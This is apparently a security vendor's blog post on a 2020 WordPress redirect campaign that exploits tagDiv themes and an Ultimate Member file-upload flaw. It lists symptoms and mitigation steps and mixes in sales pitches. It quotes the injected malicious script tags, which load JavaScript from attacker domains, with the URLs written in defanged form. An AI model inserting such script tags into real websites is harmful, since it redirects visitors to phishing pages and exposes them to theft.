WordPress Redirect Campaign: Vulnerable tagDiv Themes and Ultimate Member Plugins

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Updated: March 29th, 2020
3 mins read

With each passing day, cases of WordPress infection that redirects visitors to suspicious pages is getting common.  Recently, a vulnerability was discovered in tagDiv Themes and Ultimate Member Plugins. In this WordPress redirect hack visitors to your website are redirected to phishing or malicious pages.

In this hack, users, when redirected, are taken to irritating pages with arbitrary URL

hxxp utroro.com/xyz  or 

hxxp://murieh.abc/xyz or


and pishing reCAPTCHA images. The displayed text tries to trick visitors to allow browser notifications without disclosing the motive.

Fake CAPTCHA pishing page

Moreover, Google will penalize you by blacklisting your website against Pishing and hacked website. The web browsers will display a warning message to visitors visiting your website.

Injected Malicious Scripts

The infused infection involves a code from either of the two website sites:  cdn.allyouwant.online. and cdn.eeduelements.com.

The former was used in the recent stages of this malicious campaign and the latter was used in the beginning.

<script type='text/javascript' src='hxxps://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script><script type='text/javascript' src='hxxps://cdn.allyouwant.online/main.js?t=lp1'></script></head>

Currently 1700+ sites with the cdn.eeduelements.com script and 500+ sites with the cdn.allyouwant.online script.

Worried about WordPress redirect hack? Drop us a message on the chat widget and we’d be happy to help you fix it. Secure my WordPress website now.

Attack Vectors in  tagDiv Themes

The main people behind this WordPress exploit are tagDiv themes and the recently found (and already patched) vulnerability in a popular Ultimate Member plugin, which has 100,000+ active installations.

For outdated tagDiv themes, a malware injection appears like this:

WordPress Redirect: tagDiv themes infused malicious code

Vulnerability in the Ultimate Member Plugin

The Vulnerability in the Ultimate Member Plugin is  Unauthenticated Arbitrary File Upload. Although the vulnerability was fixed on August 9th, 2018.

Symptoms of WordPress Redirect Campaign: Ultimate Member Plugins Exploit

  1. Index.php corrupted
  2. Unknown PHP file in the /wp-content/plugins/ultimate-member/includes/images/smiles directory
  3. Error logs show: wp-content/plugins/ultimate-member/assets/dynamic_css/dynamic_profile.php on line 5 and line 6
  4. The website gets redirected to unwanted sites (Adware)
  5. Popups are shown on visiting the homepage
  6. Credit card information is stolen
  7. Unknown files are created on the server
  8. Query files in WordPress & plugin folders modified
  9. Gibberish Code in index.php

WordPress redirect hack: Mitigation

This WordPress redirect infection uses several other attack vectors and several variants of the suspicious code. Here, are some steps to mitigate WordPress redirect:

  1. Update all themes and plugins to the latest version.
  2. Setting up HTTP Authentication preventing PHP file from direct access in the upload folder. This is to prevent unauthorized execution.
  3. The malware can be found and removed in the theme’s admin interface in case of tagDiv infection.
  4. Delete all PHP files in subdirectories under wp-content/uploads/ultimatemember/temp/ in the case of the Ultimate Member Plugin exploit.

These malicious redirect campaigns frequently change infection code and affected files. It is best to consult a security expert.

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